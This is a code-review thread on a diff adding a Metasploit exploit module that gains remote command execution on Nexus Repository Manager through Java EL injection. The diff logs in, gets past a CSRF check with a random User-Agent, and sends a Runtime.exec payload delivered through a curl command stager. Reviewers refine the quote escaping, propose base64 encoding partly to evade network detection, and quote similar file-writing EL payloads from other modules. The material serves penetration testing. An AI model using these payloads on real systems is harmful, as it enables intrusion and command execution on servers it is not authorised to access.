modules/exploits/linux/http/nexus_repo_manager_el_injection.rb

```diff
@@ -0,0 +1,187 @@
+        'username' => Rex::Text.encode_base64(username),
+        'password' => Rex::Text.encode_base64(password)
+      },
+      'partial'    => true # XXX: Waiting on a 204
+    }, 3.5)
+
+    unless res
+      fail_with(Failure::Unknown, 'Target did not respond to login request')
+    end
+
+    unless res.code == 204
+      fail_with(Failure::UnexpectedReply, 'Target did not respond with 204')
+    end
+
+    unless (cookie = res.get_cookies).start_with?('NXSESSIONID')
+      fail_with(Failure::NoAccess, 'Could not log in with specified creds')
+    end
+
+    print_good("Logged in with #{cookie}")
+    cookie
+  end
+
+  def exploit
+    # NOTE: Automatic check is implemented by the AutoCheck mixin
+    super
+
+    execute_cmdstager(
+      flavor:   'curl',
+      noconcat: true,
+      cookie:   login(datastore['USERNAME'], datastore['PASSWORD'])
+    )
+  end
+
+  def execute_command(cmd, opts = {})
+    vprint_status("Executing command: #{cmd}")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path,
+                                '/service/rest/beta/repositories/go/group'),
+      'agent'  => rand_text_english(8..42), # XXX: Bypass CSRF token
+      'cookie' => opts[:cookie],
+      'ctype'  => 'application/json',
+      'data'   => json_payload(cmd)
+    )
+
+    unless res
+      fail_with(Failure::Unknown, 'Target did not respond to payload request')
+    end
+
+    unless res.code == 400
+      fail_with(Failure::UnexpectedReply, 'Target did not respond with 400')
+    end
+
+    unless res.body.match(/java\.lang\.UNIXProcess@\h+/)
+      fail_with(Failure::PayloadFailed, "Could not execute command: #{cmd}")
+    end
+
+    print_good("Successfully executed command: #{cmd}")
+  end
+
+  # PoC based off API docs: http://localhost:8081/#admin/system/api
+  def json_payload(cmd)
+    {
+      'name'                          => 'internal',
+      'online'                        => true,
+      'storage'                       => {
+        'blobStoreName'               => 'default',
+        'strictContentTypeValidation' => true
+      },
+      'group'                         => {
+=begin XXX: memberNames has to be an array, but the API example was a string
+        [
+          {
+            "id": "group",
+            "message": "Cannot deserialize instance of `java.util.ArrayList` out of VALUE_STRING token"
+          },
+          {
+            "id": "memberNames",
+            "message": "Cannot deserialize instance of `java.util.ArrayList` out of VALUE_STRING token"
+          }
+        ]
+=end
+        'memberNames'                 => [el_payload(cmd)]
+      }
+    }.to_json
+  end
+
+  # https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf
+  def el_payload(cmd)
+    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd}")})
```

Comment:
As this module does not define `BadChars` it might be a good idea to hard code a base64 decode in Java here, and Base64 encode `cmd`, presuming there is sufficient space. While Base64 encoding may increase NIDS detection, the use of `java.lang.Runtime` in combination with `getClass` and `exec` is more telling. Optionally, as `java.lang.Runtime` is a string it could also be base64 encoded, presuming sufficient space.

Reply:
I didn't notice any badchars, especially with `to_json`, but that's a valid concern.

Reply:
> 
> 
> I didn't notice any badchars, especially with `to_json`, but that's a valid concern.

Presumably use of `"` will not end well here: `exec("#{cmd}")`

Reply:
Yeah, you're right. Looks like it's one level too deep for the `to_json` escaping:

```
[1] pry(#<Msf::Modules::Exploit__Linux__Http__Nexus_repo_manager_el_injection::MetasploitModule>)> puts json_payload('echo "hi"')
{"name":"internal","online":true,"storage":{"blobStoreName":"default","strictContentTypeValidation":true},"group":{"memberNames":["${\"\".getClass().forName(\"java.lang.Runtime\").getMethods()[6].invoke(\"\".getClass().forName(\"java.lang.Runtime\")).exec(\"echo \"hi\"\")}"]}}
=> nil
[2] pry(#<Msf::Modules::Exploit__Linux__Http__Nexus_repo_manager_el_injection::MetasploitModule>)>
```

Reply:
Good point, but I was thinking about what happens when the Java code is executed on the server side at both the Java level and the system shell level.

`exec("echo pot"ato")` will not end well.

Reply:
I guess I should clarify: I didn't notice any badchars with my hardcoded `curl` command stager in unconcatenated form. Anything beyond that is liable to break due to badchars (mostly quoting) or the lack of shell passthrough, limiting the use of metachars.

Reply:
We could add shell passthrough by invoking `sh -c`, though. Quoting rules apply all the same.

Reply:
This could be a naive fix:

```suggestion
    %(${"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("".getClass().forName("java.lang.Runtime")).exec("#{cmd.gsub('"', '\\"')}")})
```

Reply:
With the patch:

```
[pid   373] execve("/usr/local/sbin/echo", ["echo", "pot\"ato"], 0x7ffc81033808 /* 20 vars */) = -1 ENOENT (No such file or directory)
[pid   373] execve("/usr/local/bin/echo", ["echo", "pot\"ato"], 0x7ffc81033808 /* 20 vars */) = -1 ENOENT (No such file or directory)
[pid   373] execve("/usr/sbin/echo", ["echo", "pot\"ato"], 0x7ffc81033808 /* 20 vars */) = -1 ENOENT (No such file or directory)
[pid   373] execve("/usr/bin/echo", ["echo", "pot\"ato"], 0x7ffc81033808 /* 20 vars */) = 0
```

Reply:
I would prefer to use Base64 or similar encoding, but I haven't spent any time figuring that out yet. I can commit this fix in the meantime if it's sufficient for quoting.

Reply:
Committed, since I'm getting successful command execution quote double quotes escaped, but we'll want a more sustainable method if possible.

Reply:
Committed but leaving unresolved, since I'm getting successful command execution with double quotes escaped, but we'll want a more sustainable method if possible, such as Base64 encoding.

Reply:
This will have to happen in a subsequent PR.

Reply:
Without bothering to investigate or test, in my naive opinion, I would have thought implementing a base64 encoder would be fairly straight forward.

Something like this has been used in the framework in the past:

```
modules/exploits/multi/http/jboss_seam_upload_exec.rb:187:            'data' => "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.io.FileOutputStream').getConstructor('java.lang.String',expressions.getClass().forName('java.lang.Boolean').getField('TYPE').get(null)).newInstance(request.getRealPath('/#{filename}').replaceAll('\\\\\\\\','/'),#{append}).write(expressions.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer(request.getParameter('c'))).close()}&c=" + b64
modules/exploits/multi/http/jira_hipchat_template.rb:289:    %Q| $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{b64}')) |
modules/exploits/multi/http/confluence_widget_connector.rb:127:        $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))
```

(that first example is terrible)

Reply:
I shouldn't even be committing to this PR anymore, but I've still got some time to squeeze. I'll use the last two examples as a lead. Thanks.

Reply:
Why not ARCH_JAVA? :trollface:

Reply:
![](https://media1.tenor.com/images/bb601d3184d071cca618f128088b4bf3/tenor.gif)

Reply:
Funny enough, I'm actually working on a remote classloading exploit right now. So maybe. :P

Reply:
And https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf has a potential example:

![image](https://user-images.githubusercontent.com/4551878/78764100-af5f7c00-794b-11ea-8e8f-39e2fd1026a1.png)